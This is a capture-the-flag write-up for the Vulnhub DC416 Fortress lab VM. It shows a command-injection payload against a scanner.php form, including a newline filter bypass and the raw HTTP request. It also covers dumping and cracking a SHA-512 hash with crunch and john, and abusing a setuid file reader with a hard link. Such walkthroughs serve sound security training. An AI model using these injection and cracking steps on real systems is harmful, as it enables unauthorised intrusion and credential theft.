So, I’m here with my first write-up for Vulnhub – DC416 Fortress challenge. So, we usually start by doing some enumeration on services. but before that we have to find out the IP Address of our machine.
Information Gathering
netdiscover will scan all active devices on our network. (Our Target is: 192.168.1.6)
Now, that we know our target IP Address let’s find out which services are running. Nmap scan suggests that server is running FreeBSD and have few services running.
If we take a look at port 80 we have Apache server running so let’s take a look.
There’s nothing on that page i through to curl it to make sure there’s nothing hidden inside but no luck.
Now, it’s time for my favorite part directory enumeration. π
So for that we have some awesome tools installed already in Kali Linux but my favorite is dirb and dirbuster. We had not luck because we couldn’t find any directory so let’s try searching for files. We know server is running Apache so why not give it a try to search for .php extensions.
|
1 |
dirb https://192.168.1.6 /usr/share/dirb/wordlists/big.txt |
let’s do it!
|
1 |
dirb https://192.168.1.6 /usr/share/dirb/wordlists/big.txt -X .php |
And we found our first lead scanner.php file. (https://192.168.1.6/scanner.php) π let’s take a look.
So we have something here. let’s try to find out what is it?
We have a input field where we enter an IP and it runs Nmap command. Good! π Maybe we can try command injection here, so let’s take a look at it’s response through Burp.
Read About Command Injection Here: https://www.owasp.org/index.php/Command_Injection
So, we did try command injection looks like there’s some kind of filtration.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
POST /scanner.php HTTP/1.1 Host: 192.168.1.6 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://192.168.1.6/scanner.php Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 17 host=127.0.0.1;ls |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 |
HTTP/1.1 200 OK Date: Thu, 08 Mar 2018 23:53:45 GMT Server: Apache/2.4.23 (FreeBSD) OpenSSL/1.0.2j-freebsd PHP/5.6.27 X-Powered-By: PHP/5.6.27 Content-Length: 472 Connection: close Content-Type: text/html; charset=UTF-8 <html> <head> <title>S C A N N 3 R</title> <link rel="stylesheet" href="styles.css" type="text/css" /> </head> <body> <div class="container"> <form method="POST" action=""> <input class="form" type="text" name="host" value="127.0.0.1" /> <input class="button" type="submit" value="Scan Target" /> </form> <pre>Command: /usr/local/bin/nmap -F -sT 127.0.0.1;ls </pre><pre>Nope. Good try though... Γ°ΒΒΒ</pre> <img class="logo" src="logo.png"> </div> </body> </html> |
So, this didn’t worked!
|
1 |
host=127.0.0.1;ls |
let’s try again!
|
1 2 |
host=127.0.0.1 ls |
Awesome!
Now after doing ls -la we found these directories.
- k1ngd0m_k3yz
- s1kr3t
These two directories looks strange let’s have a look.
|
1 2 3 4 5 6 7 8 9 |
total 144 drwxr-xr-x 4 root wheel 512 Nov 9 2016 . drwxr-xr-x 6 root wheel 512 Nov 9 2016 .. -rw-r--r-- 1 root wheel 561 Nov 8 2016 index.html drwxr-xr-x 2 root wheel 512 Nov 9 2016 k1ngd0m_k3yz -rw-r--r-- 1 root wheel 44867 Nov 4 2016 logo.png drwxr-xr-x 2 root wheel 512 Nov 9 2016 s1kr3t -rw-r--r-- 1 root wheel 759 Nov 5 2016 scanner.php -rw-r--r-- 1 root wheel 612 Nov 4 2016 styles.css |
- k1ngd0m_k3yz
|
1 2 |
-rw-r--r-- 1 root wheel 157 Nov 9 2016 master -rw-r--r-- 1 root wheel 47 Nov 9 2016 passwd |
- s1kr3t
|
1 |
-rw-r--r-- 1 root wheel 31 Nov 4 2016 flag.txt |
Now, let’s take a look inside master and passwd files.
Inside master file we have our hash. Save that to hash.txt just in case we couldn’t get any further lead.
|
1 |
craven:$6$qAgPM2TEordSoFnH$4uPUAhB.9rORkWExA8jI0Sbwn0Bj50KAK0tJ4rkrUrIkP6v.gE/6Fw9/yn1Ejl2TedyN5ziUz8N0unsHocuks.:1002:1002::0:0:User &:/home/craven:/bin/sh |
Inside passwd file.
|
1 |
craven:*:1002:1002:User &:/home/craven:/bin/sh |
flag1
The first flag can be found in the s1kr3t directory.
|
1 2 |
cat s1kr3t/flag.txt FLAG{n0_one_br3aches_teh_f0rt} |
Finally, we have found our first flag.
From our previous findingsΒ we have found that there’s a user account named craven.
ls -la /home/craven/
|
1 2 3 |
-r-------- 1 craven craven 46 Nov 6 2016 flag.txt -rw-r--r-- 1 craven craven 119 Nov 5 2016 hint.txt -rw-r--r-- 1 craven craven 77 Nov 5 2016 reminders.txt |
Look’s like we have found our second flag inside /home/craven/ directory.
We do not have read permission for flag.txt and now let’s take a look at hint.txt and reminders.txt files.
hint.txt
Keep forgetting my password, so I made myself a hint. Password is three digits followed by my
pet's name and a symbol.
reminders.txt
To buy:
* skim milk
* organic free-run eggs
* dog bone for qwerty
* sriracha
Now, that we have a hint and hint suggests that his dog name is: qwerty we’re gonna add three digits before qwerty and one symbol after and that can be done through crunch wordlist generator.
- Qwerty
- 3 digits
- Symbol
|
1 |
crunch 10 10 -t %%%qwerty^ > pass.txt |
This command will create every possible word.
Now, we have to crack hash.txt hash that we found earlier.
|
1 |
john -wordlist=pass.txt hash.txt |
It seems that we have successfully cracked our password. π
931qwerty?
Boom!
Now we’re able to get our second flag.
|
1 2 3 4 5 6 |
$ pwd /usr/home/craven $ ls flag.txt hint.txt reminders.txt $ cat flag.txt FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL} |
flag2
|
1 |
FLAG{w0uld_u_lik3_som3_b33r_with_ur_r3d_PiLL} |
It’s time to get our third flag.
I did cd /home and found another user name: vulnhub. We can spot a suid binary from the user vulnhub in itβs home directory /home/vulnhub.
|
1 2 3 4 |
$ ls craven vulnhub $ pwd /usr/home |
Inside vulnhub directory we have our third flag and reader file.
|
1 2 |
$ ls flag.txt reader |
By doing file reader we have some info about reader file.
|
1 |
reader: setuid ELF 64-bit LSB executable, x86-64, version 1 (FreeBSD), dynamically linked, interpreter /libexec/ld-elf.so.1, for FreeBSD 11.0 (1100122), FreeBSD-style, not stripped |
Since we can execute reader file as carven user we can read our third flag let’s try. π
It seems the binary checks the filename for flag.txt so letβs try to trick this check with a symbolic link:
Now to a hard link. (https://www.computerhope.com/unix/uln.htm)
Boom! π
flags3
|
1 |
FLAG{its_A_ph0t0_ph1ni5h} |
